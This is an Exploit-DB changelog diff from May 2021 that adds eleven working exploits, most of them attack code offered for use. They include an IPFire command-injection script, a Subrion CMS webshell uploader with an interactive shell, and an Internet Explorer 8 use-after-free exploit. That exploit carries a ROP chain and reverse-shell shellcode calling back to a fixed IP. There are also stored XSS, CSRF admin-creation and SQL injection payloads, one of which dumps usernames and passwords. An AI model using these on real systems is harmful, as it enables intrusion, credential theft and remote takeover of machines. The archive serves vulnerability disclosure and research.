DB: 2021-05-18

11 changes to exploits/shellcodes

Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free

OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution
OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)
Customer Relationship Management (CRM) System 1.0 - 'Category' Persistent Cross site Scripting
IPFire 2.25 - Remote Code Execution (Authenticated)
Dental Clinic Appointment Reservation System 1.0 - 'Firstname' Persistent Cross Site Scripting (Authenticated)
Dental Clinic Appointment Reservation System 1.0 - Cross Site Request Forgery (Add Admin)
Simple Chatbot Application 1.0 - 'Category' Stored Cross site Scripting
Billing Management System 2.0 - Union based SQL injection (Authenticated)
Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)
Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)
Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload

exploits/cgi/webapps/49869.py

@@ -0,0 +1,46 @@
+# Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated)
+# Date: 15/05/2021
+# Exploit Author: Mücahit Saratar
+# Vendor Homepage: https://www.ipfire.org/
+# Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso
+# Version: 2.25 - core update 156
+# Tested on: parrot os 5.7.0-2parrot2-amd64
+
+#!/usr/bin/python3
+
+import requests as R
+import sys
+import base64
+
+try:
+    host = sys.argv[1]
+    assert host[:4] == "http" and host[-1] != "/"
+    url = host + "/cgi-bin/pakfire.cgi"
+    username = sys.argv[2]
+    password = sys.argv[3]
+    komut = sys.argv[4]
+except:
+    print(f"{sys.argv[0]} http://target.com:444 username password command")
+    exit(1)
+
+veri = { 
+        "INSPAKS": f"7zip;{komut}",
+        "ACTION":"install",
+        "x": "10",
+        "y": "6" }
+token = b"Basic " + base64.b64encode(f"{username}:{password}".encode())
+header = {"Authorization": token,
+        "Connection": "close",
+        "Cache-Control": "max-age=0",
+        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
+        "Origin": host,
+        "Sec-GPC": "1",
+        "Sec-Fetch-Site": "same-origin",
+        "Sec-Fetch-Mode": "navigate",
+        "Sec-Fetch-User": "?1",
+        "Sec-Fetch-Dest": "document",
+        "Referer": host}
+
+
+R.post(url, data=veri, headers=header, verify=False)
+print("Done.")

exploits/php/webapps/45161.py

@@ -1,4 +1,4 @@
-# Title: OpenEMR < 5.0.1 - Remote Code Execution
+# Title: OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)
 # Author: Cody Zacharias
 # Date: 2018-08-07
 # Vendor Homepage: https://www.open-emr.org/

exploits/php/webapps/49868.txt

@@ -0,0 +1,33 @@
+# Exploit Title: Customer Relationship Management (CRM) System 1.0 - 'Category' Persistent Cross site Scripting
+# Date: 14-05-2021
+# Exploit Author: Vani K G
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
+# Version: 1.0
+# Tested on: Windows 10/XAMPP
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the
+two. It occurs when a malicious script is injected directly into a
+vulnerable web application.
+
+Attack Vector :
+
+This vulnerability can result in the attacker to inject the XSS
+payload in the Title field of the page and each time any user will
+open the website, the XSS triggers and attacker can able to steal the
+cookie according to the crafted payload.
+
+Vulnerable Parameters: Category input field.
+
+Payload : <script>alert(document.domain)</script>
+
+Vulnerable URL :
+http://localhost/crm/admin/?page=services&view=category
+
+Steps To Reproduce :
+1) Go to the admin Dashboard
+2) Click on Category and click Add New button.
+3) Put Payload into the 'Category' input field.
+4) Click on Save.
+5) XSS payload will be triggered.

exploits/php/webapps/49870.txt

@@ -0,0 +1,23 @@
+# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - 'Firstname' Persistent Cross Site Scripting (Authenticated)
+# Date: 14-05-2021
+# Exploit Author: Reza Afsahi
+# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: Linux parrot
+
+# --- Description --- #
+
+# The web application allows member to inject persistent Cross-Site-Scripting payload which will be executed in both member and Admin panel  
+
+# --- Proof of concept --- #
+
+1- Create account and login as member and go to:  http://localhost/APR/edit_info.php
+2- Inject this payload into Firstname input : <script>alert(document.cookie)</script>
+4- and fill other inputs as you want (Other inputs might be vulnerable as well) then click on Update button.
+5- refresh the page and Xss popup will be triggered.
+
+6- Now if Admin visit this page in his/her Dashboard : http://localhost/APR/admin/members.php
+7- Our Xss payload will be executed on Admin Browser
+
+** Attacker can use this vulnerability to take over Admin account **

exploits/php/webapps/49871.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Cross Site Request Forgery (Add Admin)
+# Date: 15-05-2021
+# Exploit Author: Reza Afsahi
+# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: PHP 7.4.11 , Linux x64_x86
+
+
+# --- Proof of concept --- #
+
+# Vulnerable file : http://localhost/APR/admin/user.php
+
+# Exploit:
+
+<html>
+<head>
+   <title>Add Admin</title>
+</head>
+<body>
+   <h1> Absolutely Not Vulnerable Site :D </h1>
+<form method="POST" action="http://127.0.0.1/APR/admin/user.php">
+   <input type="hidden" name="username" value="lol">
+   <input type="hidden" name="password" value="321" >
+   <button type="submit" name="submit">Click</button>
+</form>
+</body>
+</html>

exploits/php/webapps/49873.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Simple Chatbot Application 1.0 - 'Category' Stored Cross site Scripting
+# Date: 16-05-2021
+# Exploit Author: Vani K G
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
+# Version: 1.0
+# Tested on: Windows 10/XAMPP
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the
+two. It occurs when a malicious script is injected directly into a
+vulnerable web application.
+
+Attack Vector :
+
+This vulnerability can result in the attacker to inject the XSS
+payload in the Title field of the page and each time any user will
+open the website, the XSS triggers and attacker can able to steal the
+cookie according to the crafted payload.
+
+Vulnerable Parameters: Settings System Info field
+Payload : <script>alert(1)</script>
+
+Vulnerable URL :
+http://localhost/chatbot/admin/?page=system_info
+
+Steps To Reproduce :
+1) Go to the admin Dashboard
+2) Click on Settings and Select System Info.
+3) Put Payload into the System name  input field.
+4) Click on Save.
+5) XSS payload will be triggered.

exploits/php/webapps/49874.txt

@@ -0,0 +1,23 @@
+# Exploit Title: Billing Management System 2.0 - Union based SQL injection (Authenticated)
+# Date: 2021-05-16
+# Exploit Author: Mohammad Koochaki
+# Vendor Homepage: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14380&title=Billing+Management+System+in+PHP%2FMySQLi+with+Source+Code
+# Version: 2.0
+
+# This web application contains several SQL injection vulnerabilities in the following paths:
+        - http://localhost/editgroup.php?id=1
+        - http://localhost/edituser.php?id=1
+        - http://localhost/editcategory.php?id=10
+        - http://localhost/editproduct.php?id=1
+        - http://localhost/editsales.php?id=1
+
+# PoC (editgroup.php):
+
+- Vulnerable code:
+        $sql="SELECT * from user_groups where delete_status='0' and
+id='".$_GET['id']." '";
+
+- Payload:
+
+http://localhost/editgroup.php?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),3,4,5%20from%20users--+

exploits/php/webapps/49875.txt

@@ -0,0 +1,59 @@
+# Exploit Title: Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)
+# Date: 17/08/2021
+# Exploit Author: Abdulkadir AYDOGAN
+# Vendor Homepage: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook
+# Software Link: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook
+# Version: 2.4.4
+
+Advanced Guestbook is a free open source guestbook script developed in PHP.
+Examples of features include email notifications, uploading pictures, html
+tags handling, multiple polls, comments and themes.
+
+#Description
+The following is PoC to use the XSS bug with authorized user.
+
+Firstly there are four part of a emotion object which is :
+
+- Emotion icon
+- Emotion file name
+- Emotion command which will be used to call this object (s_code)
+- Emotion description (s_emotion)
+
+Here is the exploitation steps for vulnerability:
+
+1. Login to your admin account.
+2. Go to "Smilies" tab to view and edit emotion icons
+3. Click "edit" text in the "Action" column to edit emotions
+4. Change emotion description to Javascript code
+5. Click the "Submit Settings"
+6. Click "Smilies" tab again to view all emotions and Javascript code will
+be executed
+
+# Vulnerable Parameter Type: POST
+# Vulnerable Parameter: s_emotion
+# Attack Pattern: <script>alert("Smile more!")</script>
+
+#PoC
+HTTP Request:
+
+POST /advancedguestbook/admin.php HTTP/1.1
+Host: HOST_ADDRESS
+Content-Length: 175
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://HOST_ADDRESS
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer:
+http://HOST_ADDRESS/advancedguestbook/admin.php?action=smilies&session=17395de9919fffa0ac9476370c2c7ba0&uid=1&edit_smilie=7
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Cookie: _ga=GA1.2.2068746825.1621203842; _gid=GA1.2.1432458757.1621203842;
+_gat=1
+Connection: close
+
+s_code=:cool:&s_emotion=<script>alert("Smile
+more!")</script>&edit_smilie=7&uid=1&session=17395de9919fffa0ac9476370c2c7ba0&action=smilies&add_smilies=1

exploits/php/webapps/49876.py

@@ -0,0 +1,120 @@
+# Exploit Title: Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)
+# Date: 17/05/2021
+# Exploit Author: Fellipe Oliveira
+# Vendor Homepage: https://subrion.org/
+# Software Link: https://github.com/intelliants/subrion
+# Version: SubrionCMS 4.2.1
+# Tested on: Debian9, Debian 10 and Ubuntu 16.04
+# CVE: CVE-2018-19422
+# Exploit Requirements: BeautifulSoup library
+# https://github.com/intelliants/subrion/issues/801
+
+#!/usr/bin/python3
+
+import requests
+import time
+import optparse
+import random
+import string
+from bs4 import BeautifulSoup
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri http://target/panel")
+parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")
+parser.add_option('-p', '--passw', action="store", dest="passw", help="Password credential to login")
+
+options, args = parser.parse_args()
+
+if not options.url:
+    print('[+] Specify an url target')
+    print('[+] Example usage: exploit.py -u http://target-uri/panel')
+    print('[+] Example help usage: exploit.py -h')
+    exit()
+
+url_login = options.url
+url_upload = options.url + 'uploads/read.json'
+url_shell = options.url + 'uploads/'
+username = options.user
+password = options.passw
+
+session = requests.Session()
+
+def login():
+    global csrfToken
+    print('[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 \n')
+    print('[+] Trying to connect to: ' + url_login)
+    try:
+        get_token_request = session.get(url_login)
+        soup = BeautifulSoup(get_token_request.text, 'html.parser')
+        csrfToken = soup.find('input',attrs = {'name':'__st'})['value']
+        print('[+] Success!')
+        time.sleep(1)
+
+        if csrfToken:
+            print(f"[+] Got CSRF token: {csrfToken}")
+            print("[+] Trying to log in...") 
+
+            auth_url = url_login
+            auth_cookies = {"loader": "loaded"}
+            auth_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/", "Upgrade-Insecure-Requests": "1"}
+            auth_data = {"__st": csrfToken, "username": username, "password": password}
+            auth = session.post(auth_url, headers=auth_headers, cookies=auth_cookies, data=auth_data)
+
+            if len(auth.text) <= 7000:
+                print('\n[x] Login failed... Check credentials')
+                exit()
+            else:
+                print('[+] Login Successful!\n')
+        else:
+            print('[x] Failed to got CSRF token')
+            exit()
+
+    except requests.exceptions.ConnectionError as err:
+        print('\n[x] Failed to Connect in: '+url_login+' ')
+        print('[x] This host seems to be Down')
+        exit()
+
+    return csrfToken
+
+def name_rnd():
+    global shell_name 
+    print('[+] Generating random name for Webshell...')
+    shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15)))
+    time.sleep(1)  
+    print('[+] Generated webshell name: '+shell_name+'\n')
+
+    return shell_name
+
+def shell_upload():
+    print('[+] Trying to Upload Webshell..')
+    try:
+        up_url = url_upload
+        up_cookies = {"INTELLI_06c8042c3d": "15ajqmku31n5e893djc8k8g7a0", "loader": "loaded"}
+        up_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6159367931540763043609390275", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/uploads/"}
+        up_data = "-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n17978446266285\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"__st\"\r\n\r\n"+csrfToken+"\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\""+shell_name+".phar\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n1621210391\r\n-----------------------------6159367931540763043609390275--\r\n"
+        session.post(up_url, headers=up_headers, cookies=up_cookies, data=up_data)
+    
+    except requests.exceptions.HTTPError as conn:
+        print('[x] Failed to Upload Webshell in: '+url_upload+' ')
+        exit()
+
+def code_exec():
+    try:
+        url_clean = url_shell.replace('/panel', '')
+        req = session.get(url_clean + shell_name + '.phar?cmd=id')
+
+        if req.status_code == 200:
+            print('[+] Upload Success... Webshell path: ' + url_shell + shell_name + '.phar \n')
+            while True:
+                cmd = input('$ ')
+                x = session.get(url_clean + shell_name + '.phar?cmd='+cmd+'')
+                print(x.text)
+        else:
+            print('\n[x] Webshell not found... upload seems to have failed')
+    except:
+        print('\n[x] Failed to execute PHP code...')
+
+login()
+name_rnd()
+shell_upload()
+code_exec()

exploits/php/webapps/49877.txt

@@ -0,0 +1,43 @@
+# Exploit Title: Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload
+# Date: 2021-05-16
+# Exploit Author : bwnz
+# Software Link: https://www.sourcecodester.com/php/12802/php-staff-id-card-creation-and-printing-system.html
+# Version: 1.0
+# Tested on: Ubuntu 20.04.2 LTS
+
+# Printable Staff ID Card Creator System is vulnerable to an unauthenticated SQL Injection attack.
+# After compromising the database via SQLi, an attacker can log in and leverage an arbitrary file upload
+# vulnerability to obtain remote code execution.
+
+
+-----SQL Injection-----
+Step 1.) Navigate to the login page and populate the email and password fields.
+Step 2.) With Burp Suite running, send and capture the request.
+Step 3.) Within Burp Suite, right click and "Save item" in preparation for putting the request through SQLMap.
+Step 4.) Open a terminal and run the following command:
+	sqlmap -r <saved item>
+
+Below are the SQLMap results
+
+Parameter: user_email (POST)
+   	 Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+    Payload: user_email=test@test.com' RLIKE (SELECT (CASE WHEN (9007=9007) THEN 0x7465737440746573742e636f6d ELSE 0x28 END))-- JaaE&password=`&login_button=
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: user_email=test@test.com' AND (SELECT 7267 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7267=7267,1))),0x7162716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pCej&password=`&login_button=
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: user_email=test@test.com' AND (SELECT 2884 FROM (SELECT(SLEEP(5)))KezZ)-- bBqz&password=`&login_button=
+----- END -----
+
+
+----- Authenticated RCE via Arbitrary File Upload -----
+# For this attack,  it is assumed that you've obtained credentials via the SQL Injection attack above and have logged in.
+
+Step 1.) After logging in, click the "Initialization" option and "Add System Info".
+Step 2.) Populate the blank form with arbitrary data. At the bottom of the form, there is an option to upload a logo. Upload your evil.php file here and click "Finish".
+Step 3.) By default, the file is uploaded to http://<IP>/Staff_registration/media/evil.php. Navigate to it for RCE.
+----- END ------

exploits/windows/local/49872.js

@@ -0,0 +1,168 @@
+# Exploit Title: Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free
+# Date: 15/05/2021
+# CVE : CVE-2013-3893
+# PoC: https://github.com/travelworld/cve_2013_3893_trigger.html/blob/gh-pages/params.json
+# Exploit Author: SlidingWindow
+# Vendor Advisory: https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2013/2887505?redirectedfrom=MSDN
+# Tested on: Microsoft Internet Explorer 8 (version: 8.0.7601.17514) on Windows 7 SP1 (Version 6.1 Build 7601 SP1)
+# Bypasses: DEP, ASLR using MSVCR71.DLL
+# Thanks to @corelanc0d3r for awesome Heap Exploitation Training and @offsectraining for OSCP training
+
+<html>
+<script>
+var spraychunks = new Array();
+
+  // Use BSTR spray since DEPS spray didn't work here
+  function heapspray()
+  {
+    var ropchain = unescape("%u122c%u0c0c"); //EAX now points here. EDX = [EAX+0x70]. So call EDX will take a forward jump to stack-heap flip: 0x7c348b05 :  # XCHG EAX,ESP # RETN 
+
+    //ESP points here after stack-heap flip. jump over padding+stack-heap flip into ROP chain.
+    ropchain += unescape("%u6bd5%u7c36");  //0x7c366bd5 :  # ADD ESP,100 # RETN    ** [MSVCR71.dll] **   |   {PAGE_EXECUTE_READ}
+    
+    //Some padding
+    ropchain += unescape("%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565");
+    
+    //ESP will point to 0x0c0c122c after stack-heap flip.
+    ropchain += unescape("%u8b05%u7c34"); //0x7c348b05 :  # XCHG EAX,ESP # RETN    ** [MSVCR71.dll] **   |   {PAGE_EXECUTE_READ}
+    
+    //More padding for ADD ESP, 100
+    ropchain += unescape("%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565");
+    
+    //rop chain generated with mona.py - www.corelan.be
+    //ropchain needed a little fix
+
+    ropchain += unescape(
+      "" + // #[---INFO:gadgets_to_set_ebp:---] : 
+      "%u1cab%u7c35" + // 0x7c351cab : ,# POP EBP # RETN [MSVCR71.dll] 
+      "%u1cab%u7c35" + // 0x7c351cab : ,# skip 4 bytes [MSVCR71.dll]
+      "" + // #[---INFO:gadgets_to_set_ebx:---] : 
+      "%u728e%u7c34" + // 0x7c34728e : ,# POP EAX # RETN [MSVCR71.dll] 
+      "%ufdff%uffff" + // 0xfffffdff : ,# Value to negate, will become 0x00000201
+      "%u684b%u7c36" + // 0x7c36684b : ,# NEG EAX # RETN [MSVCR71.dll] 
+      "%u1695%u7c37" + // 0x7c371695 : ,# POP EBX # RETN [MSVCR71.dll] 
+      "%uffff%uffff" + // 0xffffffff : ,#
+      "%u5255%u7c34" + // 0x7c345255 : ,# INC EBX # FPATAN # RETN [MSVCR71.dll] 
+      "%u2174%u7c35" + // 0x7c352174 : ,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [MSVCR71.dll] 
+      "" + // #[---INFO:gadgets_to_set_edx:---] : 
+      "%u5937%u7c34" + // 0x7c345937 : ,# POP EDX # RETN [MSVCR71.dll] 
+      "%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040
+      "%u1eb1%u7c35" + // 0x7c351eb1 : ,# NEG EDX # RETN [MSVCR71.dll] 
+      "" + // #[---INFO:gadgets_to_set_ecx:---] : 
+      "%u0c81%u7c36" + // 0x7c360c81 : ,# POP ECX # RETN [MSVCR71.dll] 
+      "%ucd8c%u7c38" + // 0x7c38cd8c : ,# &Writable location [MSVCR71.dll]
+      "" + // #[---INFO:gadgets_to_set_edi:---] : 
+      "%u4648%u7c35" + // 0x7c354648 : ,# POP EDI # RETN [MSVCR71.dll] 
+      "%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll]
+      "" + // #[---INFO:gadgets_to_set_esi:---] : 
+      "%u50dd%u7c36" + // 0x7c3650dd : ,# POP ESI # RETN [MSVCR71.dll] 
+      "%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll]
+      "%u5194%u7c34" + // 0x7c345194 : ,# POP EAX # RETN [MSVCR71.dll] 
+      // "%ua140%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll]
+      // "%ua051%u7c37" +  // 7c37a051 + 0xEF should become  0x7c37a140, which is a pointer to &VirtualProtect()
+      // Because next instruction adds 0xEF into AL.
+      "%ua151%u7c37"  + // 7c37a151 + + 0xEF should become  0x7c37a140, which is a pointer to &VirtualProtect()
+      // Because next instruction adds 0xEF into AL.
+      "" + // #[---INFO:pushad:---] : 
+      "%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll] 
+      "" + // #[---INFO:extras:---] : 
+      "%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll]
+      ""); //  : 
+
+    
+    // msfvenom -p windows/shell_reverse_tcp -a x86 lhost=192.168.154.130 lport=4444 -b '\x00' -f js_le
+    // First few bytes, %uc481%ufa24%uffff (which is \x81\xc4\x24\xfa\xff\xff # add esp,-1500) move ESP away from EIP to avoid GetPC() routine from corrupting our shellcode
+
+    var shellcode = unescape("%uc481%ufa24%uffff%uccd9%u74d9%uf424%ube5d%uba98%ue3da%uc931%u52b1%u7531%u8317%u04c5%ued03%u38a9%uf116%u3e26%u09d9%u5fb7%uec53%u5f86%u6507%u6fb8%u2b43%u1b35%udf01%u69ce%ud08e%uc767%udfe8%u7478%u7ec8%u87fb%ua01d%u47c2%ua150%ub503%uf399%ub1dc%ue30c%u8f69%u888c%u0122%u6d95%u20f2%u20b4%u7a88%uc316%uf75d%udb1f%u3282%u50e9%uc870%ub0e8%u3148%ufd46%uc064%u3a96%u3b42%u32ed%uc6b0%u81f6%u1cca%u1172%ud66c%ufd24%u3b8c%u76b2%uf082%ud0b0%u0787%u6b14%u8cb3%ubb9b%ud635%u1fbf%u8c1d%u06de%u63fb%u58de%udca4%u137a%u0849%u7ef7%ufd06%u803a%u69d6%uf34c%u36e4%u9be6%ube44%u5c20%u95aa%uf295%u1655%udbe6%u4291%u73b6%ueb33%u835d%u3ebc%ud3f1%u9112%u83b2%u41d2%uc95b%ubedc%uf27b%ud736%u0916%u18d1%u8b4e%uf1a3%uab8d%u5db2%u4d1b%u4dde%uc64d%uf777%u9cd4%uf8e6%ud9c2%u7229%u1ee1%u73e7%u0c8c%u7390%u6edb%u8b37%u06f1%u1edb%ud69e%u0292%u8109%uf5f3%u4740%uacee%u75fa%u29f3%u3dc4%u8a28%ubccb%ub6bd%uaeef%u367b%u9ab4%u61d3%u7462%udb92%u2ec4%ub74c%ua68e%ufb09%ub010%ud615%u5ce6%u8fa7%u63be%u5808%u1c37%uf874%uf7b8%u083c%u55f3%u8114%u0c5a%ucc24%ufb5c%ue96b%u09de%u0e14%u78fe%u4a11%u91b8%uc36b%u952d%ue4d8%u4167"); 
+
+    var junk = unescape("%u2020%u2020");  
+    while (junk.length < 0x4000) junk += junk;
+    offset = 0x204/2 ; //0c0c1228
+    var junk_front = junk.substring(0,offset);
+    var junk_end = junk.substring(0,0x800 - junk_front.length - ropchain.length - shellcode.length)
+    var smallblock = junk_front + ropchain + shellcode + junk_end;
+
+    
+    var largeblock = "";
+    while (largeblock.length < 0x80000) { largeblock = largeblock + smallblock; }
+
+    // make allocations
+    for (i = 0; i < 0x450; i++) { spraychunks[i] = largeblock.substring(0, (0x7fb00-6)/2);  }
+    
+  }
+  
+  function alloc(nr_alloc){
+    for (var i=0; i < nr_alloc; i++){
+      divobj = document.createElement('div');
+      // Allocate 0x25 (37 decimal) bytes.  Vulnerable object size = 0x4c bytes
+      divobj.className = "\u1228\u0c0c\u4141\u4141\u4242\u4242\u4343\u4343\u4444\u4444\u4545\u4545\u4646\u4646" + 
+                       "\u4747\u4747\u4848\u4949\u4949\u5050\u5050\u5151\u5151\u5252\u5252\u5353\u5353\u5454" +
+                       "\u5454\u5555\u5555\u5656\u5656\u5757\u5757\u5858\u5858";
+    }
+  }
+
+  heapspray();
+  
+  function trigger()
+  {
+    var id_0 = document.createElement("sup");
+    var id_1 = document.createElement("audio");
+
+    heapspray();
+    document.body.appendChild(id_0);
+    document.body.appendChild(id_1);
+    id_1.applyElement(id_0);
+
+    id_0.onlosecapture=function(e) {
+    //Vulnerable Object is freed here
+    document.write("");
+    
+    //Replace/Reclaim the freed object here. 
+    //Object size is 0x4c
+    alloc(0x20);
+      
+    }
+
+    id_0['outerText']="";
+    id_0.setCapture();
+    id_1.setCapture();
+  }
+
+  window.onload = function() {
+    trigger();
+  }
+ 
+</script>
+</html>
+
+<!-- Debug: Taking a different code path for this exploit
+
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000003 ebx=00000100 ecx=40404040 edx=00000001 esi=0089c098 edi=00000000
+eip=7467b68d esp=0301c34c ebp=0301c360 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
+mshtml!CElement::Doc:
+7467b68d 8b01            mov     eax,dword ptr [ecx]  ds:002b:40404040=????????
+
+0:005> u eip
+mshtml!CElement::Doc:
+7467b68d 8b01            mov     eax,dword ptr [ecx]
+7467b68f 8b5070          mov     edx,dword ptr [eax+70h]
+7467b692 ffd2            call    edx
+7467b694 8b400c          mov     eax,dword ptr [eax+0Ch]
+7467b697 c3              ret
+7467b698 90              nop
+7467b699 90              nop
+7467b69a 90              nop
+
+0:005> ub eip
+mshtml!CElement::SecurityContext+0x22:
+7467b681 8b01            mov     eax,dword ptr [ecx]
+7467b683 8b5070          mov     edx,dword ptr [eax+70h]
+7467b686 ffe2            jmp     edx
+7467b688 90              nop
+7467b689 90              nop
+7467b68a 90              nop
+7467b68b 90              nop
+7467b68c 90              nop

files_exploits.csv

@@ -11327,6 +11327,7 @@ id,file,description,date,author,type,platform,port
 49858,exploits/windows/local/49858.txt,"Splinterware System Scheduler Professional 5.30 - Privilege Escalation",2021-05-12,"Andrea Intilangelo",local,windows,
 49863,exploits/windows_x86-64/local/49863.js,"Microsoft Internet Explorer 8/11 and WPAD service 'Jscript.dll' - Use-After-Free",2021-05-13,"Forrest Orr",local,windows_x86-64,
 49864,exploits/windows_x86-64/local/49864.js,"Firefox 72 IonMonkey - JIT Type Confusion",2021-05-13,"Forrest Orr",local,windows_x86-64,
+49872,exploits/windows/local/49872.js,"Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free",2021-05-17,SlidingWindow,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41701,7 +41702,7 @@ id,file,description,date,author,type,platform,port
